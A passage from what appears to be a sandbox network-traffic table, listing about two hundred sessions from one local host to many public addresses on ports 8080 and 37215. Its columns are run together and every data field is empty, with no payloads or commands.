                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25806192.168.2.235728470.114.48.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25807192.168.2.2335090152.20.0.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25808192.168.2.2358056140.13.50.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25809192.168.2.2356132173.78.232.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25810192.168.2.2340146175.58.169.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25811192.168.2.2347412194.233.145.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25812192.168.2.23597205.3.17.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25813192.168.2.2345796209.26.46.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25814192.168.2.23390704.198.190.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25815192.168.2.2339294199.61.217.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25816192.168.2.235414424.229.155.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25817192.168.2.2354968212.198.167.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25818192.168.2.2344808217.62.183.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25819192.168.2.235019240.177.176.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25820192.168.2.2355294212.31.77.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25821192.168.2.2342278186.240.181.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25822192.168.2.234658470.58.55.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25823192.168.2.233334450.219.78.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25824192.168.2.2341042209.90.23.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25825192.168.2.2338638177.103.102.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25826192.168.2.233478299.56.150.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25827192.168.2.2335390120.40.25.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25828192.168.2.234595258.105.49.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25829192.168.2.234593050.141.114.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25830192.168.2.234617880.10.183.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25831192.168.2.2359608133.8.160.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25832192.168.2.2353792115.214.247.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25833192.168.2.235853285.67.173.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25834192.168.2.235620238.141.190.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25835192.168.2.2347106130.56.194.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25836192.168.2.234210646.90.147.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25837192.168.2.234821260.212.232.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25838192.168.2.2352368117.20.121.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25839192.168.2.234277852.120.236.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25840192.168.2.2337748135.34.95.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25841192.168.2.2341524160.124.63.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25842192.168.2.233586245.128.100.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25843192.168.2.2357192145.167.2.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25844192.168.2.2357354196.21.97.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25845192.168.2.235679874.74.8.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25846192.168.2.2351426128.180.198.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25847192.168.2.2359432140.12.103.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25848192.168.2.2343222117.192.133.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25849192.168.2.2344796123.225.239.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25850192.168.2.2335454204.153.87.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25851192.168.2.234849247.152.68.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25852192.168.2.233545878.57.136.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25853192.168.2.234566237.153.39.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25854192.168.2.2344412191.137.196.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25855192.168.2.2341236198.51.229.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25856192.168.2.2354386205.82.25.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25857192.168.2.2341608175.164.100.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25858192.168.2.2338858199.88.47.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25859192.168.2.2349928116.35.122.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25860192.168.2.2333646193.187.190.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25861192.168.2.2341736157.165.187.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25862192.168.2.2352780136.16.162.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25863192.168.2.235497484.34.37.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25864192.168.2.2355446101.250.235.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25865192.168.2.235813814.221.120.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25866192.168.2.2344602113.122.237.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25867192.168.2.2346716101.24.48.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25868192.168.2.2359838118.77.80.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25869192.168.2.235321246.61.18.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25870192.168.2.2335644182.209.197.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25871192.168.2.2348396161.119.251.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25872192.168.2.235698859.107.47.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25873192.168.2.233325687.7.42.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25874192.168.2.234804845.4.92.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25875192.168.2.2352578176.88.199.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25876192.168.2.2334162178.115.160.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25877192.168.2.234896069.79.112.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25878192.168.2.2343620172.77.230.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25879192.168.2.2348440175.247.96.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25880192.168.2.2360074191.158.87.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25881192.168.2.2341778191.51.19.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25882192.168.2.2339580106.195.79.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25883192.168.2.2357388115.221.184.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25884192.168.2.2350238134.71.78.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25885192.168.2.2335894156.73.178.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25886192.168.2.235723847.165.149.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25887192.168.2.234209684.222.92.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25888192.168.2.2357320191.85.199.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25889192.168.2.234464646.123.107.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25890192.168.2.234832076.207.107.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25891192.168.2.235925619.8.215.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25892192.168.2.235640697.106.199.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25893192.168.2.23482541.82.235.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25894192.168.2.2346426118.113.144.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25895192.168.2.235457451.193.110.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25896192.168.2.23559482.117.105.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25897192.168.2.23367088.214.184.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25898192.168.2.236054890.8.255.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25899192.168.2.233819045.238.69.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25900192.168.2.235607475.26.111.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25901192.168.2.2357224207.33.63.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25902192.168.2.2333466115.34.95.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25903192.168.2.233873674.246.164.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25904192.168.2.2334882119.124.111.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25905192.168.2.233384436.233.147.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25906192.168.2.2347562145.100.94.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25907192.168.2.2352066116.181.206.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25908192.168.2.235012051.68.253.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25909192.168.2.236088267.117.44.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25910192.168.2.234581241.53.101.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25911192.168.2.2348212223.188.205.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25912192.168.2.2354588216.33.10.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25913192.168.2.2341104212.134.58.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25914192.168.2.234074624.211.235.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25915192.168.2.2334604133.33.247.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25916192.168.2.2352514164.160.41.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25917192.168.2.233314242.48.201.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25918192.168.2.2349642217.234.67.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25919192.168.2.235376098.200.70.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25920192.168.2.2335260157.125.58.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25921192.168.2.234579876.218.164.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25922192.168.2.2354076180.29.6.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25923192.168.2.235290697.13.242.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25924192.168.2.2340140172.129.237.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25925192.168.2.234899474.204.198.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25926192.168.2.234145883.136.105.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25927192.168.2.235897641.104.45.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25928192.168.2.2356128197.18.120.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25929192.168.2.233930041.23.248.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25930192.168.2.2351610157.213.118.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25931192.168.2.2334594157.250.106.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25932192.168.2.2360614197.99.115.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25933192.168.2.2348368197.74.162.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25934192.168.2.233610659.116.111.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25935192.168.2.2338672197.200.176.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25936192.168.2.2334802157.30.43.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25937192.168.2.2339344157.47.64.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25938192.168.2.2336734197.85.55.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25939192.168.2.235970620.19.9.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25940192.168.2.2347882197.192.149.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25941192.168.2.235099041.145.97.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25942192.168.2.2345016199.191.233.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25943192.168.2.2352728184.140.216.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25944192.168.2.2347096157.249.102.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25945192.168.2.234174841.188.85.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25946192.168.2.235170041.236.131.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25947192.168.2.2334714197.1.44.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25948192.168.2.2338702197.106.122.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25949192.168.2.2357722157.71.87.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25950192.168.2.2344332157.238.194.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25951192.168.2.2354714157.122.193.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25952192.168.2.2348490157.251.88.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25953192.168.2.2342216197.123.17.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25954192.168.2.233754041.18.45.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25955192.168.2.2343658222.122.193.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25956192.168.2.234089241.176.61.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25957192.168.2.233760041.182.217.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25958192.168.2.2344326157.215.81.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25959192.168.2.2348674197.6.145.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25960192.168.2.233803241.70.154.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25961192.168.2.2350244157.37.193.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25962192.168.2.234058441.77.54.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25963192.168.2.2358564202.124.137.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25964192.168.2.233462041.53.136.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25965192.168.2.234678041.69.66.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25966192.168.2.2337030157.189.153.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25967192.168.2.2351416204.11.249.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25968192.168.2.234354841.153.106.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25969192.168.2.2358614156.214.13.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25970192.168.2.235519841.78.221.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25971192.168.2.2343070157.174.212.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25972192.168.2.2347804157.197.83.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25973192.168.2.2359964152.133.3.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25974192.168.2.235451241.203.223.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25975192.168.2.233533096.129.71.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25976192.168.2.2341762197.94.123.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25977192.168.2.233516041.210.123.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25978192.168.2.2345452195.219.33.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25979192.168.2.23370701.226.86.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25980192.168.2.2347690197.254.39.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25981192.168.2.235629641.106.129.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25982192.168.2.235232241.221.246.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25983192.168.2.2356632157.120.250.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25984192.168.2.2356604157.107.160.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25985192.168.2.2360130157.209.194.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25986192.168.2.2357480197.248.48.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25987192.168.2.234213041.59.58.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25988192.168.2.2351686197.156.45.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25989192.168.2.2334608197.98.143.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25990192.168.2.2346620197.189.197.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25991192.168.2.234589841.123.119.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25992192.168.2.233457641.109.81.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25993192.168.2.2347156190.195.193.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25994192.168.2.2350150197.42.212.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25995192.168.2.2344974157.128.77.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25996192.168.2.235382241.28.23.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25997192.168.2.2352324197.53.196.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25998192.168.2.235012441.109.86.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25999192.168.2.2347738197.153.143.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26000192.168.2.234502641.239.49.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26001192.168.2.233550041.192.31.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26002192.168.2.2348686197.25.73.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26003192.168.2.2339176157.187.0.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26004192.168.2.2346622197.99.11.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26005192.168.2.234011841.114.211.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26006192.168.2.2333678157.47.116.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26007192.168.2.2344376157.217.231.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26008192.168.2.233754441.52.35.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26009192.168.2.235225686.155.22.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26010192.168.2.2334180157.59.43.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26011192.168.2.235991641.223.97.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26012192.168.2.2350700197.140.8.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26013192.168.2.2339656185.170.163.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26014192.168.2.2333170130.168.71.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26015192.168.2.2353396157.159.65.21937215
                                                        TimestampBytes transferredDirectionData


